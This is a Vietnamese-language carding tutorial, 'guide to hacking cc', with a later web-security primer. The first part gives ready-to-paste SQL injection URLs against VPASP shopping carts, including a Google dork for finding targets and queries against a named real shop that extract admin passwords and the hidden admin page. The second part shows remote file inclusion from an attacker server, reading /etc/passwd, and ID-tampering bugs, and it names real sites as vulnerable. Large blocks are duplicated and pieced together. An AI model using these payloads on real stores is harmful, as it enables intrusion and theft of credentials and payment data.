Hướng dẫn hack cc
1-HACK
SHOP
VPASP khỏi cần nói các bạn cũng biết đó là Shopping Cart. Phiên bản bị lỗi SQL - Injection là 4.5 và 5.0 còn những phiên bản mới thì tôi không có source để xem nó còn lỗi gì hay không ?
Vì VPASP thường sử dụng cơ sở dữ liệu MS Access cho nên việc ngắt lệnh như SQL - Server là không thể cho nên chỉ còn một cách là hợp lệnh SQL để lấy
kết quả. Thực hiện các bước sau:
Bước 1: Vào Google.com, tìm cụm từ sau: allinurl: shopdisplaycategories.asp. Bạn sẽ thấy ra cả đống site. Kiểm tra link xem có bị lỗi SQL - Injection hay
không ?
Bước 2:
Đối với phiên bản VPASP 4.5 thì lỗi tại file shopdisplaycategories.asp và shopdisplayproducts.asp. Ở phiên bản VPASP 5.0 thì đã sửa lỗi hai file trên nhưng
còn một chỗ vẫn bị lỗi là file shopexd.asp
Ví dụ site sau:
http://www.hopscotchdressingup.co.uk/store/shopdisplayproducts.asp?id=8'&cat=Halloween.
Mặc dù ta đã thêm ' ở tại shopdisplayproducts.asp?id=8' nhưng vẫn không bị lỗi. Ta thử tiếp file link sau :
http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149'. Nó xuất hiện lỗi
HTTP 500 - Internal server error
internet
Bước 3:
Ta thực hiện gộp lệnh để lấy giá trị username và password như sau:
Link ban đầu :http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149
Link gộp truy vấn : http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode,fldusername%2b'/'% 2bfldpassword,cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,w
eight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,categor
y,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ
ate,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,s
upplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3,billprice,billi
nstallments,billinstallmenttype,billinterval,maximumquantity,frontpage from products,tbluser where catalogid=149
Các bạn sẽ hỏi là cái đống hỗn độn ở link trên lấy ở đâu ra? Hì hì chỉ đọc source VPASP mới biết nó gồm những trường nào trong bản product rồi từ đó gộp
lệnh cho đủ các trường và thay thế trường tên của sản phầm bằng trường username và password. Sở dĩ ta phải cho id=-1 để ngắt lệnh SQL thứ nhất khi
hợp nhất thì nó sẽ thực hiện lệnh SQL thứ hai.
Sau khi hợp SQL ta sẽ có kết quả user và password là "Sy87XXXXX/gL37ytXXXXX" là hai giá trị được thay thế tại tên của sản phẩm.
Như vậy ta đã có user và password của admin rồi. Mừng quá login vào shopadmin.asp thôi ! . Thông thường thì tên file Admin ControlPanel là
shopadmin.asp nếu như nó chưa đổi.
Bước 4: Ta truy cập vào http://www.hopscotchdressingup.co.uk/store/shopadmin.asp thử xem thế nào? Chà ! file nó đổi tên mất rồi. Làm sao đây ? Tiếp tục gộp lệnh để lấy tên file đã thay đổi thôi !
Cũng với link http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149 ta gộp lệnh như sau để lấy tên file truy cập vào Admin Control Panel.
http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode,fieldvalue,cdescription,cprice,ccategory,cdescurl,features,cimag
eurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,special
offer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,k
eywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,mini
mumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3,billprice,billinstallments,billinstallmenttype,billinterval,maximumquantity,frontp
age from products,configuration where fieldname='xadminpage' and catalogid=149
Sau khi thực hiện ta đã có tên file truy cập vào Admin Control Panel là hopoff.asp
Như vậy ta có thể truy cập đến file Admin. http://www.hopscotchdressingup.co.uk/store/hopoff.asp.
Lưu ý: Khi truy cập vào Admin Control Panel nếu gặp hai trường nhập password thì : một là ngồi thử hai là đi kiếm cái khác . Vì password thứ 2 là một hằng nên không thể dùng cách hợp lệnh để lấy được. Muốn lấy chắc viết email đến admin hỏi thử password thứ hai là gì, tôi đã có password thứ nhất của you rôi !!! Hi hi hi
Đối với phiên bản VPASP 4.5 thì cũng làm tương tự như trên chỉ khác là ở chỗ gộp lệnh lấy username, password và tên file truy cập vào Admin Control Panel
Ví dụ : http:///shopdisplaycategories.asp?id=1 chẳng hạn. Thì lệnh gộp lấy username, password và tên file admin như sau
http:///shopdisplaycategories.asp?id=1 union select catalogid,ccode,fldusername%2b':'% 2bfldpassword,cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,w
eight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,categor
y,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ
ate,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,s
upplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3 from products,tbluser where 1=1 or 1=1
http:///shopdisplaycategories.asp?id=1 union select catalogid,ccode,fieldvalue,cdescription,cprice,ccategory,cdescurl,features,cimag
eurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,special
offer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,k
eywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,mini
mumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3 from products,tbluser,configuration where fieldname='xadminpage'
Site VPASP sử dụng cơ sở dữ liệu SQL - Server thì quá dễ để khai thác như sau
http:///shopdisplaycategories.asp?id=1
and%201=convert(int,(select%20top%201%20fldusername%2b'/'%2bfldpassword%20from%20tbluser))--sp_password
http:///shopdisplaycategories.asp?id=1 and%201=convert(int,(select top 1 fieldvalue from configuration where
fieldname='xadminpage'))--sp_password
----------------------------------------------------------------------------------------------------------------
VPASP khỏi cần nói các bạn cũng biết đó là Shopping Cart. Phiên bản bị lỗi SQL - Injection là 4.5 và 5.0 còn những phiên bản mới thì tôi không có source để xem nó còn lỗi gì hay không ?
Vì VPASP thường sử dụng cơ sở dữ liệu MS Access cho nên việc ngắt lệnh như SQL - Server là không thể cho nên chỉ còn một cách là hợp lệnh SQL để lấy
kết quả. Thực hiện các bước sau:
Bước 1: Vào Google.com, tìm cụm từ sau: allinurl: shopdisplaycategories.asp. Bạn sẽ thấy ra cả đống site. Kiểm tra link xem có bị lỗi SQL - Injection hay
không ?
Bước 2:
Đối với phiên bản VPASP 4.5 thì lỗi tại file shopdisplaycategories.asp và shopdisplayproducts.asp. Ở phiên bản VPASP 5.0 thì đã sửa lỗi hai file trên nhưng
còn một chỗ vẫn bị lỗi là file shopexd.asp
Ví dụ site sau:
http://www.hopscotchdressingup.co.uk/store/shopdisplayproducts.asp?id=8'&cat=Halloween.
Mặc dù ta đã thêm ' ở tại shopdisplayproducts.asp?id=8' nhưng vẫn không bị lỗi. Ta thử tiếp file link sau :
http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149'. Nó xuất hiện lỗi
HTTP 500 - Internal server error
internet
Bước 3:
Ta thực hiện gộp lệnh để lấy giá trị username và password như sau:
Link ban đầu :http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149
Link gộp truy vấn : http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode,fldusername%2b'/'% 2bfldpassword,cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,w
eight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,categor
y,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ
ate,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,s
upplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3,billprice,billi
nstallments,billinstallmenttype,billinterval,maximumquantity,frontpage from products,tbluser where catalogid=149
Các bạn sẽ hỏi là cái đống hỗn độn ở link trên lấy ở đâu ra? Hì hì chỉ đọc source VPASP mới biết nó gồm những trường nào trong bản product rồi từ đó gộp
lệnh cho đủ các trường và thay thế trường tên của sản phầm bằng trường username và password. Sở dĩ ta phải cho id=-1 để ngắt lệnh SQL thứ nhất khi
hợp nhất thì nó sẽ thực hiện lệnh SQL thứ hai.
Sau khi hợp SQL ta sẽ có kết quả user và password là "Sy87XXXXX/gL37ytXXXXX" là hai giá trị được thay thế tại tên của sản phẩm.
Như vậy ta đã có user và password của admin rồi. Mừng quá login vào shopadmin.asp thôi ! . Thông thường thì tên file Admin ControlPanel là
shopadmin.asp nếu như nó chưa đổi.
Bước 4: Ta truy cập vào http://www.hopscotchdressingup.co.uk/store/shopadmin.asp thử xem thế nào? Chà ! file nó đổi tên mất rồi. Làm sao đây ? Tiếp tục gộp lệnh để lấy tên file đã thay đổi thôi !
Cũng với link http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149 ta gộp lệnh như sau để lấy tên file truy cập vào Admin Control Panel.
http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode,fieldvalue,cdescription,cprice,ccategory,cdescurl,features,cimag
eurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,special
offer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,k
eywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,mini
mumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3,billprice,billinstallments,billinstallmenttype,billinterval,maximumquantity,frontp
age from products,configuration where fieldname='xadminpage' and catalogid=149
Sau khi thực hiện ta đã có tên file truy cập vào Admin Control Panel là hopoff.asp
Như vậy ta có thể truy cập đến file Admin. http://www.hopscotchdressingup.co.uk/store/hopoff.asp.
Lưu ý: Khi truy cập vào Admin Control Panel nếu gặp hai trường nhập password thì : một là ngồi thử hai là đi kiếm cái khác . Vì password thứ 2 là một hằng nên không thể dùng cách hợp lệnh để lấy được. Muốn lấy chắc viết email đến admin hỏi thử password thứ hai là gì, tôi đã có password thứ nhất của you rôi !!! Hi hi hi
Đối với phiên bản VPASP 4.5 thì cũng làm tương tự như trên chỉ khác là ở chỗ gộp lệnh lấy username, password và tên file truy cập vào Admin Control Panel
Ví dụ : http:///shopdisplaycategories.asp?id=1 chẳng hạn. Thì lệnh gộp lấy username, password và tên file admin như sau
http:///shopdisplaycategories.asp?id=1 union select catalogid,ccode,fldusername%2b':'% 2bfldpassword,cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,w
eight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,categor
y,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ
ate,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,s
upplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3 from products,tbluser where 1=1 or 1=1
http:///shopdisplaycategories.asp?id=1 union select catalogid,ccode,fieldvalue,cdescription,cprice,ccategory,cdescurl,features,cimag
eurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,special
offer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,k
eywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,mini
mumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3 from products,tbluser,configuration where fieldname='xadminpage'
Site VPASP sử dụng cơ sở dữ liệu SQL - Server thì quá dễ để khai thác như sau
http:///shopdisplaycategories.asp?id=1
and%201=convert(int,(select%20top%201%20fldusername%2b'/'%2bfldpassword%20from%20tbluser))--sp_password
http:///shopdisplaycategories.asp?id=1 and%201=convert(int,(select top 1 fieldvalue from configuration where
fieldname='xadminpage'))--sp_password
----------------------------------------------------------------------------------------------------------------
2-THU
THUAT BAO MAT TRONG LAP TRINH WEBSIDE
Lỗi trong xử
lý Files
•Lỗi trong xử lý file chúng ta thường gặp trong lập trình PHP, ASP , CGI , v…v…
•Lỗi này gây ra do lập trình viên đã sơ ý trong việc sử dụng các hàm xử lý file như : include(),require(),require_one(),fopen(), Execute , v…v….
•Các hacker có thể sử dụng lỗi này để xâm nhập vào các server để ăn cắp thông tin , deface v..v… và còn có thể cướp quyền quản lý server…
•Đây là lỗi khá nghiêm trọng vì vậy khi lập trình chúng ta phải cẩn thận để không mắc lỗi này.
• Trong PHP , một số hàm như include , require , v…v… cho phép hacker có thể chạy script ở một server khác ( remote files ) để tấn công trực tiếp vào website hoặc server của bạn.
Lỗi trong xử lý Files
Ví dụ :
Trong IBF 1.1 bị lỗi xử lý file ở ad_member.php
===== ad_member.php =====
global $IN, $root_path, $INFO, $DB, $SKIN, $ADMIN, $std, $MEMBER, $GROUP, $ibforums;
require $root_path."sources/lib/post_parser.php";
$parser = new post_parser();
if ($IN['MEMBER_ID'] == "")
{
$ADMIN->error("Could not resolve member id");
}
=====================
Lỗi trong xử lý Files
Hacker có thể tấn công vào như sau: http://victim.com/ibf/sources/Admin/ad_member.php?IN[code]=doform&root_path=http://myserver/
Hacker có thể chạy script PHP nằm trong file sources/lib/post_parser.php trên http://myserver (remote server) . Script trong file này có thể là script backdoor, chiếm quyền admin , leo thang chiếm server , deface v..v…
• Ngoài ra, Hacker còn có thể tận dụng các lỗi trong việc xử lý file để có thể đọc source hoặc đọc các file hệ thống.
Ví dụ : Hacker có thể đọc source của trang web : http://interhacker.org chỉ bằng một cách rất đơn giản là gõ URL:http://interhacker.org/cc/?cclib=../index.php
===== index.php =====
include "../functions/basicfc.php";
include "../functions/poster.php";
site_header("Hacking Credit Card");
show_poster("post","ccpost");
show_poster("lib","cclib");
hit_counter("cc.cnt");
site_footer();
?>
=================
Lỗi này do người lập trình Web đã xử lý không cẩn thận những tham số của hàm fopen(…),… tạo điều kiện cho hacker có thể xem source v..v…
Không những thế hacker còn có thể sử dụng các lỗi này để đọc các file quan trọng của server như /etc/passwd , /etc/domainalias …
Các lỗi về file như thế này đặc biệt nguy hiểm đối với các server bảo mật lỏng lẻo.
•Những lỗi trong xử lý file này không những chỉ trên PHP mà còn lỗi trên CGI, ASP
•Example: (Chưa hoàn thành xong phần)
•Lỗi này là một trong những lỗi cơ bản nhưng nó đã gây ra không ít những khó khăn , thiệt hại cho các chủ Website, server v...v…
•Tại Việt Nam , đã có rất nhiều server , website bị hack bởi lỗi này. Điển hình như:
www.fptnet.com.vn
www.hcm.fpt.vn
www.pavietnam.com
Hiện nay, các lập trình viên đã chú trọng hơn đến lỗi này, vì vậy các trang web của Việt Nam rất ít khi gặp lỗi này . Đây là một tín hiệu mừng cho bảo mật Việt Nam. Lỗi trong khai báo biến và xử lý biến là vô cùng nguy hiểm cho các Website .
•Lỗi này do người viết code không chú ý hay có thể do sai sót trong việc khai báo hoặc xử lý biến mà các hacker có thể lợi dụng để tấn công
•Rất nhiều Website : Shoping Cart , Mua bán Domain ,…. bị mắc lỗi này trong 1 số khâu quan trọng mà các hacker có thể lợi dụng để gian lận tiền bạc trong giao dịch hay mua bán bất hợp pháp , ……
Thiệt hại do việc tấn công sẽ không nhỏ và còn làm mất uy tín của người lập trình viên.
Chúng ta sẽ phân tích một số lỗi để thấy được sự nguy hiểm của lỗi này (tất cả các lỗi nêu ra đều đã được fix)
Lỗi trong khai báo và xử lý biến
www.truongthi.com.vn:
Bạn có thể access dễ dàng vào Control panel của trang Web trường thi mà trong đó chứa rất nhiều thông tin về account ( 1260, prepaid) , thông tin về Card Trường thi chỉ bằng cách gõ URL:
Lỗi trong khai báo và xử lý biến
www.truongthi.com.vn/Admin/login.asp?uid=1
Sở dĩ có lỗi trên là do trường thi đã không cẩn thận trong check biến uid để Hacker dễ dàng thâm nhập vào Admin Control Panel.
Lỗi trong khai báo và xử lý biến
www.registerfly.com:
Registerfly là một web site lớn để đăng kí domain nhưng vừa rồi lỗi biến push domain. Dựa vào lỗi này Các hacker có thể chuyển toàn bộ n domain của 1 tài khoản này sang tài khoản khác 1 cách bất hợp pháp . Nguyên nhân do cơ chế Push Domain cửa registerfly . Khi push domain từ tài khoản của mình sang tài khoản của người khác trên adress url : push.php?push=0 .
Lỗi trong khai báo và xử lý biến
•Biến push=0 nghĩa là chuyển domain của mình sang người khác , vì registerfly sơ xuất các hacker đã thay đổi giá trị push=1 trên Url ngẫu nhiên chuyển ngược lại domain của người khác sang tài khoản của mình , đây là biến push do registerfly định nghĩa 1 cách chưa cẩn thận , cho phép các tài khoản khác thay đổi giá trị biến mà không được phép .
•Lỗi Session trong enom và register :Đây là lỗi tương đối nguy hiểm khi ngườI viết code không chú ý đến biến cần xét hoặc không mã hóa session id cho 1 member dẫn đến có thể access vào user qua secssion id .
Ví dụ : trong 1 trang thông tin : các thành viên được xác đinh bằng session id , khi 1 người sửa thông tin về mình trên address: http://victim.com/profile.php?id=43 .Người đó sửa id=54 lập tức sang sửa được Information của người khác . Nguyên nhân là do người viết code chỉ chú ý đến thành viên đó có id=43 chứ chưa quan tâm đến các yếu tố khác như username.
Thậm chí mặc dù id được mã hoá md5 : http://victim.com/profile.php?id=432hjhfjsd87fs5435fgg4545. Các hacker có thể đoán được số id rồi mà hoá md5 id đó để có thể tấn công lên .
www.enom.com : Bug secssion id cho phép access từ tài khoản domain của mình sang của ngườI khác . www.ttvnonline.com cũng bị hack theo cách này .
www.register.com: Công ty idefense đã công bố lỗi forgot password : Các hacker có thể access để thay đổi pass của username đăng kí tại register.com thông qua session ID.Hacker có thể buter force để lấy được session Id.
•Ibf forum 1.2 RC 1 : Hiện nay phiên bản mới nhất của Ibf là 1.2 RC 2 nhưng phiên bản 1.2 RC 1 vẫn rất nhiều người sử dụng. Ở phiên bản này , Hacker có thể dễ dàng đột nhập vào cơ sở dữ liệu lấy password của Admin ( Mặc dù đã được mã hoá nhưng vẫn có thể sử dụng được - Cướp quyền Admin )
Hacker chỉ cần gõ URL:
http://victim.com/index.php?act=member&name=%2527....
Sở dĩ có lỗi như trên vì trong file:
===== memberlist.php =====
$ibforums->input['name'] = $std->clean_value(trim(urldecode(stripslashes($ibforums->input['name']))));
if ($ibforums->input['name'] == "")
{
$ibforums->input['name_box'] = 'all';
}
=====================
Trước khi được xử lý biến $ibforums->input[‘name’] có giá trị là %27….Sau khi xử lý biến này có giá trị là ‘… Hacker lợi dụng lỗi này để tấn công và lấy password admin
•Đây là một lỗi rất nguy hiểm.
•Rất nhiều Website của Việt Nam bị lỗi này như:
•Lỗi trong xử lý file chúng ta thường gặp trong lập trình PHP, ASP , CGI , v…v…
•Lỗi này gây ra do lập trình viên đã sơ ý trong việc sử dụng các hàm xử lý file như : include(),require(),require_one(),fopen(), Execute , v…v….
•Các hacker có thể sử dụng lỗi này để xâm nhập vào các server để ăn cắp thông tin , deface v..v… và còn có thể cướp quyền quản lý server…
•Đây là lỗi khá nghiêm trọng vì vậy khi lập trình chúng ta phải cẩn thận để không mắc lỗi này.
• Trong PHP , một số hàm như include , require , v…v… cho phép hacker có thể chạy script ở một server khác ( remote files ) để tấn công trực tiếp vào website hoặc server của bạn.
Lỗi trong xử lý Files
Ví dụ :
Trong IBF 1.1 bị lỗi xử lý file ở ad_member.php
===== ad_member.php =====
global $IN, $root_path, $INFO, $DB, $SKIN, $ADMIN, $std, $MEMBER, $GROUP, $ibforums;
require $root_path."sources/lib/post_parser.php";
$parser = new post_parser();
if ($IN['MEMBER_ID'] == "")
{
$ADMIN->error("Could not resolve member id");
}
=====================
Lỗi trong xử lý Files
Hacker có thể tấn công vào như sau: http://victim.com/ibf/sources/Admin/ad_member.php?IN[code]=doform&root_path=http://myserver/
Hacker có thể chạy script PHP nằm trong file sources/lib/post_parser.php trên http://myserver (remote server) . Script trong file này có thể là script backdoor, chiếm quyền admin , leo thang chiếm server , deface v..v…
• Ngoài ra, Hacker còn có thể tận dụng các lỗi trong việc xử lý file để có thể đọc source hoặc đọc các file hệ thống.
Ví dụ : Hacker có thể đọc source của trang web : http://interhacker.org chỉ bằng một cách rất đơn giản là gõ URL:http://interhacker.org/cc/?cclib=../index.php
===== index.php =====
include "../functions/basicfc.php";
include "../functions/poster.php";
site_header("Hacking Credit Card");
show_poster("post","ccpost");
show_poster("lib","cclib");
hit_counter("cc.cnt");
site_footer();
?>
=================
Lỗi này do người lập trình Web đã xử lý không cẩn thận những tham số của hàm fopen(…),… tạo điều kiện cho hacker có thể xem source v..v…
Không những thế hacker còn có thể sử dụng các lỗi này để đọc các file quan trọng của server như /etc/passwd , /etc/domainalias …
Các lỗi về file như thế này đặc biệt nguy hiểm đối với các server bảo mật lỏng lẻo.
•Những lỗi trong xử lý file này không những chỉ trên PHP mà còn lỗi trên CGI, ASP
•Example: (Chưa hoàn thành xong phần)
•Lỗi này là một trong những lỗi cơ bản nhưng nó đã gây ra không ít những khó khăn , thiệt hại cho các chủ Website, server v...v…
•Tại Việt Nam , đã có rất nhiều server , website bị hack bởi lỗi này. Điển hình như:
www.fptnet.com.vn
www.hcm.fpt.vn
www.pavietnam.com
Hiện nay, các lập trình viên đã chú trọng hơn đến lỗi này, vì vậy các trang web của Việt Nam rất ít khi gặp lỗi này . Đây là một tín hiệu mừng cho bảo mật Việt Nam. Lỗi trong khai báo biến và xử lý biến là vô cùng nguy hiểm cho các Website .
•Lỗi này do người viết code không chú ý hay có thể do sai sót trong việc khai báo hoặc xử lý biến mà các hacker có thể lợi dụng để tấn công
•Rất nhiều Website : Shoping Cart , Mua bán Domain ,…. bị mắc lỗi này trong 1 số khâu quan trọng mà các hacker có thể lợi dụng để gian lận tiền bạc trong giao dịch hay mua bán bất hợp pháp , ……
Thiệt hại do việc tấn công sẽ không nhỏ và còn làm mất uy tín của người lập trình viên.
Chúng ta sẽ phân tích một số lỗi để thấy được sự nguy hiểm của lỗi này (tất cả các lỗi nêu ra đều đã được fix)
Lỗi trong khai báo và xử lý biến
www.truongthi.com.vn:
Bạn có thể access dễ dàng vào Control panel của trang Web trường thi mà trong đó chứa rất nhiều thông tin về account ( 1260, prepaid) , thông tin về Card Trường thi chỉ bằng cách gõ URL:
Lỗi trong khai báo và xử lý biến
www.truongthi.com.vn/Admin/login.asp?uid=1
Sở dĩ có lỗi trên là do trường thi đã không cẩn thận trong check biến uid để Hacker dễ dàng thâm nhập vào Admin Control Panel.
Lỗi trong khai báo và xử lý biến
www.registerfly.com:
Registerfly là một web site lớn để đăng kí domain nhưng vừa rồi lỗi biến push domain. Dựa vào lỗi này Các hacker có thể chuyển toàn bộ n domain của 1 tài khoản này sang tài khoản khác 1 cách bất hợp pháp . Nguyên nhân do cơ chế Push Domain cửa registerfly . Khi push domain từ tài khoản của mình sang tài khoản của người khác trên adress url : push.php?push=0 .
Lỗi trong khai báo và xử lý biến
•Biến push=0 nghĩa là chuyển domain của mình sang người khác , vì registerfly sơ xuất các hacker đã thay đổi giá trị push=1 trên Url ngẫu nhiên chuyển ngược lại domain của người khác sang tài khoản của mình , đây là biến push do registerfly định nghĩa 1 cách chưa cẩn thận , cho phép các tài khoản khác thay đổi giá trị biến mà không được phép .
•Lỗi Session trong enom và register :Đây là lỗi tương đối nguy hiểm khi ngườI viết code không chú ý đến biến cần xét hoặc không mã hóa session id cho 1 member dẫn đến có thể access vào user qua secssion id .
Ví dụ : trong 1 trang thông tin : các thành viên được xác đinh bằng session id , khi 1 người sửa thông tin về mình trên address: http://victim.com/profile.php?id=43 .Người đó sửa id=54 lập tức sang sửa được Information của người khác . Nguyên nhân là do người viết code chỉ chú ý đến thành viên đó có id=43 chứ chưa quan tâm đến các yếu tố khác như username.
Thậm chí mặc dù id được mã hoá md5 : http://victim.com/profile.php?id=432hjhfjsd87fs5435fgg4545. Các hacker có thể đoán được số id rồi mà hoá md5 id đó để có thể tấn công lên .
www.enom.com : Bug secssion id cho phép access từ tài khoản domain của mình sang của ngườI khác . www.ttvnonline.com cũng bị hack theo cách này .
www.register.com: Công ty idefense đã công bố lỗi forgot password : Các hacker có thể access để thay đổi pass của username đăng kí tại register.com thông qua session ID.Hacker có thể buter force để lấy được session Id.
•Ibf forum 1.2 RC 1 : Hiện nay phiên bản mới nhất của Ibf là 1.2 RC 2 nhưng phiên bản 1.2 RC 1 vẫn rất nhiều người sử dụng. Ở phiên bản này , Hacker có thể dễ dàng đột nhập vào cơ sở dữ liệu lấy password của Admin ( Mặc dù đã được mã hoá nhưng vẫn có thể sử dụng được - Cướp quyền Admin )
Hacker chỉ cần gõ URL:
http://victim.com/index.php?act=member&name=%2527....
Sở dĩ có lỗi như trên vì trong file:
===== memberlist.php =====
$ibforums->input['name'] = $std->clean_value(trim(urldecode(stripslashes($ibforums->input['name']))));
if ($ibforums->input['name'] == "")
{
$ibforums->input['name_box'] = 'all';
}
=====================
Trước khi được xử lý biến $ibforums->input[‘name’] có giá trị là %27….Sau khi xử lý biến này có giá trị là ‘… Hacker lợi dụng lỗi này để tấn công và lấy password admin
•Đây là một lỗi rất nguy hiểm.
•Rất nhiều Website của Việt Nam bị lỗi này như:
www.tuyensinh.vdc.com.vn
|
www.vietel.com.vn
|
www.member.fpt.vn
|
www.support.vnn.vn
|
www.moet.edu.vn
|
www.home.vnn.vn
|
Lỗi SQL
injection biến
• Hiện nay lỗi SQL injection là một trong những lỗi cực kì nguy hiểm .
• Hacker có thể sử dụng lỗi này để tấn công vào cơ sở dữ liệu của Website hoặc tấn công vào cả server
• Hacker có thể ăn cắp , cập nhật thông tin hoặc upload file để hack server.
• Rất nhiều Website trong nước và quốc tế bị lỗi này.
•Một số site bị lỗi này như:
• Hiện nay lỗi SQL injection là một trong những lỗi cực kì nguy hiểm .
• Hacker có thể sử dụng lỗi này để tấn công vào cơ sở dữ liệu của Website hoặc tấn công vào cả server
• Hacker có thể ăn cắp , cập nhật thông tin hoặc upload file để hack server.
• Rất nhiều Website trong nước và quốc tế bị lỗi này.
•Một số site bị lỗi này như:
www.support.vnn.vn
|
www.fpt.vn
|
www.hcm.fpt.vn
|
www.tuyensinh.vdc.com.vn
|
www.fptnet.com.vn
|
www.member.fpt.vn
|
Một số phương
pháp cơ bản bảo mật trong lập trình Web
• Xử lý biến là một trong những phương pháp quan trọng trong lập trình để có thể bảo mật thật tốt cho Website của bạn
• Xử lý biến có nhiều giai đoạn khá phức tạp nhưng không thể không làm vì nếu bạn không xử lý biến cẩn thận sẽ gây ra hậu quả rất nặng nề
• Các hacker sẽ không thể làm gì website của bạn ( trừ khi hack server hoặc domain) nếu bạn kiểm tra và xử lý biến một cách cẩn thận
• Chống SQL injection: Đối với Website nào sử dụng database cũng vậy , bạn cần phải chú trọng đến việc chống SQL injection.
Bạn nên làm theo các bước như sau:
Một số phương pháp xử lý biến
- Thay thế tất cả các dấu ‘ thành ‘’ hoặc xoá tất cả dấu ‘đi
- Xoá các dấu đặc biệt trong SQL như -- , ; , …
Trong PHP , dấu ‘ sẽ được chuyển thành dấu \’ , về cơ bản thì nó không gây nguy hiểm đối với mySQL nhưng đối với những loại khác như oracle, v..v… thì cách chuyển này không hiệu quả , nên bạn hãy chú ý để tránh lỗi.
• Chống các lỗi về file: Để chống các lỗi về file bạn nên thực hiện các bứơc như sau:
-Thay thế tất cả các dấu / thành kí tự khác
-Loại bỏ các kí tự như .. , . , v..v..
• Chống XSS : XSS là một lỗi khá thông dụng hacker có thể sử dụng lỗi này để chôm chỉa cookies v…v…Để chống lỗi này bạn nên làm như sau:
- Loại bỏ tất cả các tag html ( có thể sử dụng lệnh có sẵn) hoặc thay thể các kí tự đặc biệt như <,>,….
- Ngoài ra, những kí tự như: ;,:,//,… bạn nên xoá bỏ hoặc thay thế thanh mã hex của nó
Logging
• Logging là một kĩ thuật bảo mật khá đơn giản nhưng hiệu quả.
• Bạn nên log lại những thông tin về lỗi trên Website , rất có thể lỗi đó rất nguy hiểm có thể ảnh hưởng đến Website của bạn
• Bạn có thể chỉ cần bỏ thời gian viết những đoạn script logging đơn giản để có thể log lại những hoạt động bất hợp pháp trên Website của bạn.
• Sử dụng error_log() ( PHP ) , Err (ASP ), … là bạn có thể log lại bất cứ các err nào trên Website của bạn.
• Hiện nay , hầu như tất cả các Website lớn đều đặt Logging …
3-NHUNG BAI HOC CO BAN SHIP HANG
• Xử lý biến là một trong những phương pháp quan trọng trong lập trình để có thể bảo mật thật tốt cho Website của bạn
• Xử lý biến có nhiều giai đoạn khá phức tạp nhưng không thể không làm vì nếu bạn không xử lý biến cẩn thận sẽ gây ra hậu quả rất nặng nề
• Các hacker sẽ không thể làm gì website của bạn ( trừ khi hack server hoặc domain) nếu bạn kiểm tra và xử lý biến một cách cẩn thận
• Chống SQL injection: Đối với Website nào sử dụng database cũng vậy , bạn cần phải chú trọng đến việc chống SQL injection.
Bạn nên làm theo các bước như sau:
Một số phương pháp xử lý biến
- Thay thế tất cả các dấu ‘ thành ‘’ hoặc xoá tất cả dấu ‘đi
- Xoá các dấu đặc biệt trong SQL như -- , ; , …
Trong PHP , dấu ‘ sẽ được chuyển thành dấu \’ , về cơ bản thì nó không gây nguy hiểm đối với mySQL nhưng đối với những loại khác như oracle, v..v… thì cách chuyển này không hiệu quả , nên bạn hãy chú ý để tránh lỗi.
• Chống các lỗi về file: Để chống các lỗi về file bạn nên thực hiện các bứơc như sau:
-Thay thế tất cả các dấu / thành kí tự khác
-Loại bỏ các kí tự như .. , . , v..v..
